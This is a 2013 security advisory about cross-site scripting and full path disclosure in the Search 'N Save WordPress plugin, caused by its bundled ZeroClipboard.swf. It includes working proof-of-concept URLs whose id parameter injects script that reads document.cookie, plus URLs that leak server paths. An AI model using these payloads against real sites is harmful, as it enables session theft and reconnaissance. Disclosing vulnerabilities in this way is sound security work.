WordPress Search N Save XSS & Path Disclosure

2013.07.09
Credit: MustLive
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Hello list! I want to inform you about vulnerabilities in Search 'N Save plugin for WordPress. These are Cross-Site Scripting and Full path disclosure vulnerabilities. These XSS holes are in ZeroClipboard.swf, which is used in the plugin. In February I wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103) and in multiple web applications. ------------------------- Affected products: ------------------------- Vulnerable are all versions of Search 'N Save. ------------------------- Affected vendors: ------------------------- Table For 7 Media http://tablefor7media.com ---------- Details: ---------- Cross-Site Scripting (WASC-08): XSS via id parameter and XSS via copying payload into clipboard. http://site/wp-content/plugins/SearchNSave/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height http://site/wp-content/plugins/SearchNSave/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height Full path disclosure (WASC-13): http://site/wp-content/plugins/SearchNSave/searchnsave.php http://site/wp-content/plugins/SearchNSave/error_log (leakage of full paths at web sites where showing errors is off and they are saving into error_log) ------------ Timeline: ------------ 2013.02.18 - informed old and new developers of ZeroClipboard. 2013.05.10 - announced at my site. 2013.05.11 - informed developers of Search and Share. 2013.07.04 - disclosed at my site (http://websecurity.com.ua/6499/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

References:

http://tablefor7media.com


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